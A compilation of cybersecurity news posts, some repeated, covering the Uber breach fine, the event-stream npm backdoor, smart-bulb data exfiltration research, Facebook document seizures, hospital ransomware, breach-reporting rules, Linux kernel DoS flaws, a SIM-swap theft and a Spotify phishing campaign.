The Dutch Data Protection Authority (Dutch DPA) fined the company 600,000 euro ($679,790)  for failing to protect the personal information of 174,000 Dutch citizens.

“The Dutch Data Protection Authority (Dutch DPA) imposes a fine of €600.000 upon Uber B.V. and Uber Technologies, Inc (UTI) for violating the Dutch data breach regulation. ” states the Dutch DPA.

“This data breach has affected 57 million Uber users worldwide, and concerns 174.000 Dutch citizens. Amongst the data were names, e-mail addresses and telephone numbers of customers and drivers.”

In an official statement, Uber announced that it is “pleased to close this chapter on the data incident from 2016.”

The company highlighted that it has introduced a number of technical improvements since the data breach.

“We learn from our mistakes,” the company said.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach appeared first on Security Affairs.

Professionally Evil Insights: Spring Break without Breaking the Bank: Hands On Training

Over the last eight years, one of the main focuses of Secure Ideas has been education.  One responsibility we take very seriously is that of growing the skills within our clients and the public, with the objective of raising the bar in security.  This mindset and core passion of Secure Ideas is because we all believe that we stand on the shoulders of giants. As each of us has grown into the roles we currently hold, we were not only shaped and developed by our own experiences, but also by the knowledge shared by others.  This desire to learn and grow is one of the main things that make me proud to be a part of the security community.

However, there are a couple of significant problems with our industry:  First, information security needs are growing faster than skilled personnel are learning.  Second, the cost of training has increased outrageously over the past decade.

The first issue has been discussed for almost as long as I have been involved in information security.  Even Alan Paller of the SANS Institute has been speaking about the skills gap for over a decade!  The second issue is even worse as it makes it harder to fix the first.  Training costs for a single class often exceed $5000 without even factoring in travel and the time away from work. So how do we fix this?

At Secure Ideas, we have decided that it is our responsibility as active practitioners to help fix this lack of affordable training and help address the skills gap.  To that end, we are committed to the following for 2019:

  1. First, we want to announce our Professionally Evil Spring Break event.  This 3-day event will host two classes; Professionally Evil Network Security and Professionally Evil Application Security.  The first will focus on network penetration testing and the second focuses on application security and assessments. Either class is only $750, discounted to an early bird price of $600 until January 18, 2019.  Moreover veterans, active duty military and first responders get either for 50% off.
  2. Second, our Secure Ideas Training site has recorded classes starting at $25 each and vets get them for free!  And our webcasts will continue to be run as often as we can.
  3. Third, we will continue to support and release our open-source training products such as SamuraiWTF and the Professionally Evil Web Penetration Testing 101 course.

We hope that together we can all help increase the skills of our industry and provide affordable training for all.  Let us know if you have any questions or if you would like us to run a private training for your organization.



Professionally Evil Insights

Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins

Hacker compromised third-party NodeJS module “Event-Stream” introducing a malicious code aimed at stealing funds in Bitcoin wallet apps.

The malicious code was introduced in the version 3.3.6, published on September 9 via the  Node Package Manager (NPM) repository.

The Event-Stream library is a very popular NodeJS module used to allow developers the management of data streams, it has nearly 2 million downloads a week.

It has been estimated that the tainted version of the library was downloaded by nearly 8 million developers.

The library was created by Dominic Tarr, who maintained it for a long time, but when he left the project allowed an unknown programmer, called “right9ctrl” to continue its work.

“he emailed me and said he wanted to maintain the module, so I gave it to him. I don’t get any thing from maintaining this module, and I don’t even use it anymore, and havn’t for years.” wrote Tarr.

Tarr trusted right9ctrl  because of his important contributions to the project, but the expert once gained the access to the library, released a new version released Event-Stream version 3.3.6, containing a new library, called Flatmap-Stream, as a dependency, which was specifically designed to implement the malicious feature.

The bad news is that the code remained undetected for more than 2 months because it was encrypted. The malicious code spotted by a computer science student at California State University, Ayrton Sparling (FallingSnow handle on gitHub), who reported it.

“If you are using anything crypto-currency related, then maybe. As discovered by @maths22, the target seems to have been identified as copay related libraries. It only executes successfully when a matching package is in use (assumed to be copay at this point).” reported Sparling  on GitHub

“If you are using a crypto-currency related library and if you see flatmap-stream@0.1.1 after running npm ls event-stream flatmap-stream, you are most likely affected.

For example:

$ npm ls event-stream flatmap-stream

flatmap-stream@0.1.1″

The manager of the NPM repository who analyzed the malicious code discovered that it was designed to target people using the open-source bitcoin wallet app BitPay, distribution of the Copay project, that leverages the event-stream.

A security advisory published by BitPay confirms that Copay versions 5.0.2 through 5.1.0 were affected by the malicious code, the organization released the Copay version 5.2.0 to address the issue.

“We have learned from a Copay GitHub issue report that a third-party NodeJS package used by the Copay and BitPay apps had been modified to load malicious code which could be used to capture users’ private keys. Currently we have only confirmed that the malicious code was deployed on versions 5.0.2 through 5.1.0 of our Copay and BitPay apps. However, the BitPay app was not vulnerable to the malicious code. We are still investigating whether this code vulnerability was ever exploited against Copay users.” BitPay says in the advisory.

“Users should assume that private keys on affected wallets may have been compromised, so they should move funds to new wallets (v5.2.0) immediately.Users should not attempt to move funds to new wallets by importing affected wallets’ twelve word backup phrases (which correspond to potentially compromised private keys). Users should first update their affected wallets (5.0.2-5.1.0) and then send all funds from affected wallets to a brand new wallet on version 5.2.0, using the Send Max feature to initiate transactions of all funds.”

The malicious code allows the attackers to steal digital coins stored in the Dash Copay Bitcoin wallets and transfer them to a server located in Kuala Lumpur, Malaysia.

On Monday, NPM maintainers removed the backdoor from the repository.

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins appeared first on Security Affairs.

Experts demonstrate how to exfiltrate data using smart bulbs

Security researchers with Checkmarx developed two mobile applications that abuse the functionality of smart bulbs for data exfiltration.

Security researchers with Checkmarx developed two mobile applications that exploit smart bulbs features for data exfiltration.

The experts used the Magic Blue smart bulbs that implement communication through Bluetooth 4.0. The devices are manufactured by the Chinese company called Zengge and could be controlled using both Android and iOS apps.

The company supplies major brands like Philips and Osram etc.

The experts focused their study on devices using the Low Energy Attribute Protocol (ATT) to communicate.

The first test made by the experts consisted of sniffing communication between the smart bulbs and the paired Mobile Application. The pairing method used by the researcher is Just Works.

The experts paired the Android mobile phone with the iLight app and started sniffing the traffic while changing the colors of the smart bulbs.

In this way, the researchers discovered the commands sent by the mobile app to the smart bulbs. The team made a reverse engineering of the Mobile Application using the jadx tool.

 smart bulbs analysis

Once gained the complete control of the bulbs, experts started working on an application that leverages the light of the bulbs to transfer information from a compromised device to the attacker.

“The main plan for exfiltration was to use light as a channel to transfer information from a compromised device to the attacker. Light can achieve longer distances, which was our goal.” reads the analysis published by the experts.

“Imagine the following attack scenario: a BLE device (smartphone) gets compromised with malware. The malware steals the user’s credentials. The stolen information is sent to an attacker using a BLE light bulb nearby.”

smart bulbs analysis 2

Checkmark experts used a smartphone connected to a telescope to receive the exfiltrated data without raising suspicion.

The researchers created two applications for the data exfiltration, one installed on the victim’s mobile device and the other users on the attacker’s mobile device to receive and interpret the data.

The application installed on the victim’s device modulates the light intensity to transfer data, it runs in either Normal or Stealth mode. The Stealth mode is hard to detect to the victim’s eye because it uses the shades of blue.

“We created two apps, the first app for sending the exfiltrated data and a second one for receiving it. The app that transmits the information changes the blue light intensity – weaker for binary 1 and stronger for binary 0. The app has two options: Normal mode and Stealth mode. The first one may be visible to human-eye and the stealth mode is very hard to detect because of the variations of shades of blue used.” continues the experts.

Below a video PoC created by the experts.

“These methods will work on every smart bulb that allows control by an attacker. In the future, we would like to create a better proof of concept that allows us to test a database of vulnerable bulbs and even implement AI to learn and implement new bulbs along the way,” Checkmarx concludes.

Pierluigi Paganini

(Security Affairs – data exfiltration, smart bulbs)

The post Experts demonstrate how to exfiltrate data using smart bulbs appeared first on Security Affairs.

Security Affairs: UK Parliament seized confidential Facebook docs to investigate its data protection policies.

UK Parliament Seizes seized confidential Facebook documents from the developer of a now-defunct bikini photo searching app to investigate its data protection policies.

A British lawmaker obliged a visiting tech executive to share the files ahead of an international hearing that parliament is hosting on Tuesday to gather info into disinformation and “fake news.”

Committee Chairman Damian Collins obtained and reviewed the documents the parliament’s Digital, Culture, Media and Sport Committee has received from the app maker Six4Three relating to Facebook.

“Under UK law & parliamentary privilege we can publish papers if we choose to as part of our inquiry.”

Six4Three acquired the files, related to a period between 2013 and 2014, as part of a U.S. lawsuit against Facebook.

The authorities are investigating the Facebook’s privacy policies in 2015 that led Six4Three to shut down its app, Pikinis. Pikinis was an app that allowed users to find photos of their friends in bikinis and bathing suits by searching their friends list.

Collins aims at demonstrating how Facebook abuses could result in misinformation campaigns and interfering with political elections.

Facebook executive, Richard Allan, will have to respond to the answers of lawmakers from seven countries at the committee’s hearing in London next Tuesday.

Lawmakers from seven countries are preparing to grill a Facebook executive, Richard Allan, at the committee’s hearing in London. Facebook CEO Mark Zuckerberg has refused to be present.

“The U.K. committee used its powers to compel the chief executive Six4Three, Theodore Kramer, who was on a business trip to London, to turn over the files, according to parliamentary records and news reports.” reported the AP agency.

“The committee twice requested that Kramer turn over the documents. When he failed to do so, Kramer was escorted to parliament and told he risked imprisonment if he didn’t hand them over, the Observer newspaper reported.”

The company is opposing to the disclosure of the files, a judge in California ordered them sealed earlier this year.

Allan informed Collins via email the judge is expected to give guidance on the legal status of the documents as early as Monday,

“Six4Three’s claims are entirely meritless,” Facebook said in a statement.

Last week, Facebook announced it will appeal the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

The social network giant is sustaining that U.K regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO,  even after the misuse of the data was discovered in December 2015, the company did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’data such as the SCL Group, that was able to access the platform until 2018.

Facebook considers the fine as unacceptable because there are many practices online that are commonly accepted even if they threaten the privacy of the users.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post UK Parliament seized confidential Facebook docs to investigate its data protection policies. appeared first on Security Affairs.



Security Affairs

UK Parliament seized confidential Facebook docs to investigate its data protection policies.

UK Parliament Seizes seized confidential Facebook documents from the developer of a now-defunct bikini photo searching app to investigate its data protection policies.

A British lawmaker obliged a visiting tech executive to share the files ahead of an international hearing that parliament is hosting on Tuesday to gather info into disinformation and “fake news.”

Committee Chairman Damian Collins obtained and reviewed the documents the parliament’s Digital, Culture, Media and Sport Committee has received from the app maker Six4Three relating to Facebook.

“Under UK law & parliamentary privilege we can publish papers if we choose to as part of our inquiry.”

Six4Three acquired the files, related to a period between 2013 and 2014, as part of a U.S. lawsuit against Facebook.

The authorities are investigating the Facebook’s privacy policies in 2015 that led Six4Three to shut down its app, Pikinis. Pikinis was an app that allowed users to find photos of their friends in bikinis and bathing suits by searching their friends list.

Collins aims at demonstrating how Facebook abuses could result in misinformation campaigns and interfering with political elections.

Facebook executive, Richard Allan, will have to respond to the answers of lawmakers from seven countries at the committee’s hearing in London next Tuesday.

Lawmakers from seven countries are preparing to grill a Facebook executive, Richard Allan, at the committee’s hearing in London. Facebook CEO Mark Zuckerberg has refused to be present.

“The U.K. committee used its powers to compel the chief executive Six4Three, Theodore Kramer, who was on a business trip to London, to turn over the files, according to parliamentary records and news reports.” reported the AP agency.

“The committee twice requested that Kramer turn over the documents. When he failed to do so, Kramer was escorted to parliament and told he risked imprisonment if he didn’t hand them over, the Observer newspaper reported.”

The company is opposing to the disclosure of the files, a judge in California ordered them sealed earlier this year.

Allan informed Collins via email the judge is expected to give guidance on the legal status of the documents as early as Monday,

“Six4Three’s claims are entirely meritless,” Facebook said in a statement.

Last week, Facebook announced it will appeal the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

The social network giant is sustaining that U.K regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO,  even after the misuse of the data was discovered in December 2015, the company did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’data such as the SCL Group, that was able to access the platform until 2018.

Facebook considers the fine as unacceptable because there are many practices online that are commonly accepted even if they threaten the privacy of the users.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post UK Parliament seized confidential Facebook docs to investigate its data protection policies. appeared first on Security Affairs.

Security Affairs: Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry, the last incident in order of time impacted the Ohio Hospital System.

The ransomware attack infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly caused the disruption of the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on Friday, Nov. 23, evening, according to The Times Ledger newspaper, the hospitals were not able to accept ER patients via emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

East Ohio Regional Hospital

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.



Security Affairs

Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry, the last incident in order of time impacted the Ohio Hospital System.

The ransomware attack infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly caused the disruption of the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on Friday, Nov. 23, evening, according to The Times Ledger newspaper, the hospitals were not able to accept ER patients via emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

East Ohio Regional Hospital

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.

When Do You Need to Report a Data Breach?

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

The number of data breaches that were tracked in the U.S. in 2017 totaled 1,579, a nearly 44.7 percent increase from the previous year. Data breaches, incidents in which personal information is accidentally or unlawfully stolen, lost, disclosed, accessed, altered or destroyed, can happen to organizations of any size and sector.

Most data breach laws deal with personal data, which is essentially any information that can be associated with a particular person. Other rules concern personally identifiable information, which is data that someone could use, alone or along with additional information, to trace or distinguish a person’s identity.

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

When Should You Report a Data Breach?

In general, you should report a personal data breach if it likely poses a risk to people and threatens their rights and freedoms. This is based on the General Data Protection Regulation (GDPR), which applies to any organization that handles the data of European Union citizens. An incident might threaten someone’s rights and freedoms if it may result in identity theft, identity fraud, financial loss, discrimination, damage to reputation, social disadvantage or loss of confidentiality.

International, federal and state laws vary in their requirements about when to report breaches. In the U.S., all 50 states, the District of Columbia, Puerto Rico, Guam and the Virgin Islands have laws that require entities to notify people of breaches involving personally identifiable information.

How Soon After a Breach Should You Report It?

Under the GDPR, an organization that experiences a personal data breach must notify the appropriate authorities within 72 hours of discovering it. Within that timeframe, data controllers are also required to conduct an investigation of the incident, identify the affected data, inform impacted individuals and create a plan for containing the breach. If the organization can’t complete these activities within 72 hours, it is expected to provide an explanation as to why.

Under the Health Insurance Portability and Accountability Act (HIPAA), entities affected by the law must inform authorities and the impacted individuals within 60 days, but only if 500 or more people are affected. Authorities for some other sectors, such as the Securities and Exchange Commission (SEC), don’t have specific timeframe requirements.

Requirements under state laws vary. In New Mexico, businesses have 45 days to issue a notification if the incident impacted 1,000 or more residents of the state. California requires companies to send out notifications if 500 or more residents are affected, but it doesn’t have a specific timeframe requirement.

Laws, of course, affect how soon companies must report cybersecurity incidents. They should also do their best to ensure they have as much accurate information as possible before sending out an alert to avoid miscommunications. If an organization waits too long, on the other hand, the damage may already be done. It’s important to strike a balance between these two extremes.

To Whom Should You Report a Breach?

Who you should notify depends on the laws that apply to you, the industry you’re in and who was affected. In many cases, you must notify the supervising authorities. Under the GDPR, for example, you need to notify the Information Commissioner’s Office. If your organization is covered by the Health Breach Notification Rule, you must notify the U.S. Federal Trade Commission (FTC) and perhaps the media. If you are covered by the HIPAA Breach Notification Rule, you’ll need to inform the U.S. Health and Human Services department.

It is advisable to tell law enforcement about a breach as quickly as possible. You may call local police, but if they are not familiar with cybersecurity incidents, you can also call your local FBI office.

If you store information for other businesses, notify them. If information pertaining to a certain organization is stolen, contact that organization. For example, if an attack results in the theft of bank account numbers, notify the affected banks. If the breaches involve names and Social Security numbers, you may need to contact the major credit bureaus.

You may also need to contact the individuals who may be affected by the breach and inform them of what data was affected, what you’re doing to address the situation and what individuals can do to protect themselves.

Why Report a Breach?

Reporting breaches of personal data enables regulating authorities, law enforcement and individuals to take action to reduce the amount of damage that may occur. Some of these authorities may also be able to help you ensure your system is secure again and prevent further data loss.

The laws that affect your organization can vary depending on your location, industry and other factors. Consider these requirements as well as what is best for the individuals affected when deciding whether to report a breach.

 

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, data breach)

The post When Do You Need to Report a Data Breach? appeared first on Security Affairs.

Security Affairs: When Do You Need to Report a Data Breach?

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

The number of data breaches that were tracked in the U.S. in 2017 totaled 1,579, a nearly 44.7 percent increase from the previous year. Data breaches, incidents in which personal information is accidentally or unlawfully stolen, lost, disclosed, accessed, altered or destroyed, can happen to organizations of any size and sector.

Most data breach laws deal with personal data, which is essentially any information that can be associated with a particular person. Other rules concern personally identifiable information, which is data that someone could use, alone or along with additional information, to trace or distinguish a person’s identity.

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

When Should You Report a Data Breach?

In general, you should report a personal data breach if it likely poses a risk to people and threatens their rights and freedoms. This is based on the General Data Protection Regulation (GDPR), which applies to any organization that handles the data of European Union citizens. An incident might threaten someone’s rights and freedoms if it may result in identity theft, identity fraud, financial loss, discrimination, damage to reputation, social disadvantage or loss of confidentiality.

International, federal and state laws vary in their requirements about when to report breaches. In the U.S., all 50 states, the District of Columbia, Puerto Rico, Guam and the Virgin Islands have laws that require entities to notify people of breaches involving personally identifiable information.

How Soon After a Breach Should You Report It?

Under the GDPR, an organization that experiences a personal data breach must notify the appropriate authorities within 72 hours of discovering it. Within that timeframe, data controllers are also required to conduct an investigation of the incident, identify the affected data, inform impacted individuals and create a plan for containing the breach. If the organization can’t complete these activities within 72 hours, it is expected to provide an explanation as to why.

Under the Health Insurance Portability and Accountability Act (HIPAA), entities affected by the law must inform authorities and the impacted individuals within 60 days, but only if 500 or more people are affected. Authorities for some other sectors, such as the Securities and Exchange Commission (SEC), don’t have specific timeframe requirements.

Requirements under state laws vary. In New Mexico, businesses have 45 days to issue a notification if the incident impacted 1,000 or more residents of the state. California requires companies to send out notifications if 500 or more residents are affected, but it doesn’t have a specific timeframe requirement.

Laws, of course, affect how soon companies must report cybersecurity incidents. They should also do their best to ensure they have as much accurate information as possible before sending out an alert to avoid miscommunications. If an organization waits too long, on the other hand, the damage may already be done. It’s important to strike a balance between these two extremes.

To Whom Should You Report a Breach?

Who you should notify depends on the laws that apply to you, the industry you’re in and who was affected. In many cases, you must notify the supervising authorities. Under the GDPR, for example, you need to notify the Information Commissioner’s Office. If your organization is covered by the Health Breach Notification Rule, you must notify the U.S. Federal Trade Commission (FTC) and perhaps the media. If you are covered by the HIPAA Breach Notification Rule, you’ll need to inform the U.S. Health and Human Services department.

It is advisable to tell law enforcement about a breach as quickly as possible. You may call local police, but if they are not familiar with cybersecurity incidents, you can also call your local FBI office.

If you store information for other businesses, notify them. If information pertaining to a certain organization is stolen, contact that organization. For example, if an attack results in the theft of bank account numbers, notify the affected banks. If the breaches involve names and Social Security numbers, you may need to contact the major credit bureaus.

You may also need to contact the individuals who may be affected by the breach and inform them of what data was affected, what you’re doing to address the situation and what individuals can do to protect themselves.

Why Report a Breach?

Reporting breaches of personal data enables regulating authorities, law enforcement and individuals to take action to reduce the amount of damage that may occur. Some of these authorities may also be able to help you ensure your system is secure again and prevent further data loss.

The laws that affect your organization can vary depending on your location, industry and other factors. Consider these requirements as well as what is best for the individuals affected when deciding whether to report a breach.

 

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, data breach)

The post When Do You Need to Report a Data Breach? appeared first on Security Affairs.



Security Affairs

Linux Kernel is affected by two DoS vulnerabilities still unpatched

Linux Kernel is affected by two denial-of-service (DoS) flaws, both vulnerabilities are NULL pointer deference issues

Linux Kernel is affected by two denial-of-service (DoS) vulnerabilities, the issues impact Linux kernel 4.19.2 and previous versions.

Both flaws are rated as Medium severity and are NULL pointer deference issues that can be exploited by a local attacker to trigger a DoS condition.

The first vulnerability tracked as CVE-2018-19406 resides in the Linux kernel function called kvm_pv_send_ipi implemented in arch/x86/kvm/lapic.c.

A local attacker can exploit the flaw by using crafted system calls to reach a situation where the apic map is not initialized.

“kvm_pv_send_ipi in arch/x86/kvm/lapic.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where the apic map is uninitialized.” reads the security advisory.

“The reason is that the apic map has not yet been initialized, the testcase
triggers pv_send_ipi interface by vmcall which results in kvm->arch.apic_map
is dereferenced. This patch fixes it by checking whether or not apic map is
NULL and bailing out immediately if that is the case.” reads a blog post published by Wanpeng.

The second flaw, tracked as CVE-2018-19407 resides in the Linux Kernel function vcpu_scan_ioapic that is defined in arch/x86/kvm/x86.c.

The flaw is triggered when I/O Advanced Programmable Interrupt Controller (I/O APIC) does not initialize correctly.

The vulnerability could be exploited by a local attacker using crafted system calls that reach a situation where ioapic is uninitialized.

“The vcpu_scan_ioapic function in arch/x86/kvm/x86.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where ioapic is uninitialized.” reads the security advisory.

“The reason is that the testcase writes hyperv synic HV_X64_MSR_SINT6 msr and triggers scan ioapic logic to load synic vectors into EOI exit bitmap. However, irqchip is not initialized by this simple testcase, ioapic/apic objects should not be accessed,” reads the analysis published by Wanpeng Li.

Unofficial patches for both flaws were released in the unofficial Linux Kernel Mailing List (LKML) archive, but haven’t been pushed upstream.

Pierluigi Paganini

(Security Affairs – Linux Kernel, DoS)

The post Linux Kernel is affected by two DoS vulnerabilities still unpatched appeared first on Security Affairs.

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Security Affairs

Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.

Hacker takeovers Drake’s Fortnite account to yell racial slurs

By Carolina

The official Fortnite account of the Canadian rapper Drake going by the handle of “Duddus647” was hacked in an attack on Thanksgiving weekend. The hacker used the account to join Fortnite live stream charity event run by Ninja, a pro streamer and shout racial slurs and obscenities. The charity event was supposed to raise funds for the Ellen DeGeneres Wildlife Fund. Upon witnessing the non-stop […]

This is a post from HackRead.com Read the original post: Hacker takeovers Drake’s Fortnite account to yell racial slurs

Security Affairs: Very trivial Spotify phishing campaign uncovered by experts

Researchers at AppRiver uncovered a very trivial phishing campaign targeting the streaming service Spotify, anyway, it is important to share info about it.

Security researchers at AppRiver uncovered a phishing campaign targeting the popular streaming service Spotify.

The phishing campaign was discovered earlier November, attackers used convincing emails to trick Spotify users into providing their account credentials.

The messages include a link that points to phishing websites that prompt users into entering their username and password. Attackers use them to compromise the Spotify accounts and any other account on other services that share the same credentials.

“Recently, AppRiver detected a phishing campaign that was targeting Spotify customers by email with the purpose of hijacking the owner’s account.” reads the analysis published AppRiver.

“The attacker attempted to dupe users into clicking on a phishing link that would redirect them to a deceptive website. Once at the site, users were prompted to enter their user name and password (surprise!), giving the attacker the ability to hijack the account.”

spotify phishing campaign

Attackers set up a login page that looks identical to the actual Spotify login page, but with an URL that isn’t the legitimate one.

Experts also pointed out that the “From Address domain is not the official Spotify one.

The attacker trick victims into clicking on a green button with the words “CONFIRM ACCOUNT.” The messages pose themselves as urgent communication about account restrictions that could be removed with an action of the users.

Clicking on the button, users are redirected to a phishing page.

Sincerely speaking, this specific campaign is not complex and could be easily spotted by most of the users.

The post published by the experts has just one goal, share information about a campaign that could deceive non-tech-savvy users, for this reason, I decided to speak about the Spotify campaign too.

Pierluigi Paganini

(Security Affairs – Spotify phishing campaign, cybercrime)

The post Very trivial Spotify phishing campaign uncovered by experts appeared first on Security Affairs.



Security Affairs

Very trivial Spotify phishing campaign uncovered by experts

Researchers at AppRiver uncovered a very trivial phishing campaign targeting the streaming service Spotify, anyway, it is important to share info about it.

Security researchers at AppRiver uncovered a phishing campaign targeting the popular streaming service Spotify.

